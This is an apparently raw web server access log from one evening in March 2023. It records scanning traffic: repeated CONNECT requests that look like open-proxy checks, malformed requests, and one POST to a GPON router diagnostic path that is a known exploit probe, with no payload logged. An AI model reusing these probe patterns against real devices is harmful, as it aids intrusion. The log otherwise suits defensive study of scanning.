194.169.217.221 - - [09/Mar/2023:20:33:55 +0530] "GET / HTTP/1.1" 200 11250
194.169.217.248 - - [09/Mar/2023:20:33:55 +0530] "GET / HTTP/1.1" 200 11250
103.89.14.169 - - [09/Mar/2023:20:56:59 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
134.209.146.49 - - [09/Mar/2023:20:57:48 +0530] "-" 400 -
134.209.146.49 - - [09/Mar/2023:20:57:48 +0530] "-" 400 -
134.209.146.49 - - [09/Mar/2023:20:57:49 +0530] "GET / HTTP/1.1" 200 11250
134.209.146.49 - - [09/Mar/2023:20:57:49 +0530] "-" 400 -
134.209.146.49 - - [09/Mar/2023:20:57:49 +0530] "-" 400 -
175.100.117.62 - - [09/Mar/2023:21:08:35 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:21:19:17 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:21:19:17 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:21:19:22 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:21:19:22 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:21:19:27 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:21:19:27 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:21:19:32 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:21:19:32 +0530] "-" 400 -
199.195.248.153 - - [09/Mar/2023:21:24:39 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
103.89.14.169 - - [09/Mar/2023:21:36:36 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
128.1.248.26 - - [09/Mar/2023:21:36:51 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:21:47:09 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:21:47:09 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:21:47:09 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:21:47:09 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:21:47:09 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:21:47:14 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:21:47:14 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:21:47:14 +0530] "-" 400 -
45.227.254.8 - - [09/Mar/2023:22:01:53 +0530] "-" 400 -
45.227.254.8 - - [09/Mar/2023:22:01:53 +0530] "-" 400 -
103.89.14.169 - - [09/Mar/2023:22:08:29 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
84.242.139.154 - - [09/Mar/2023:22:15:11 +0530] "GET / HTTP/1.1" 200 11250
185.168.174.116 - - [09/Mar/2023:22:26:01 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:22:27:15 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:22:27:15 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:22:27:15 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:22:27:15 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:22:27:15 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:22:27:20 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:22:27:20 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:22:27:20 +0530] "-" 400 -
114.246.35.131 - - [09/Mar/2023:22:51:18 +0530] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 1030
114.246.35.131 - - [09/Mar/2023:22:51:18 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:31 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:31 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:36 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:36 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:41 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:23:06:41 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:23:06:46 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:23:06:46 +0530] "-" 400 -
176.111.173.223 - - [09/Mar/2023:23:12:30 +0530] "CONNECT www.google.com:443 HTTP/1.1" 400 -
193.142.146.101 - - [09/Mar/2023:23:35:17 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:23:35:35 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:23:42:18 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:23:42:18 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:23:42:18 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:23:42:18 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:23:42:19 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:23:42:23 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:23:42:23 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:23:42:23 +0530] "-" 400 -
194.165.16.76 - - [09/Mar/2023:23:42:32 +0530] "-" 400 -
194.165.16.76 - - [09/Mar/2023:23:42:32 +0530] "-" 400 -
115.127.49.130 - - [09/Mar/2023:23:56:44 +0530] "GET / HTTP/1.1" 200 11250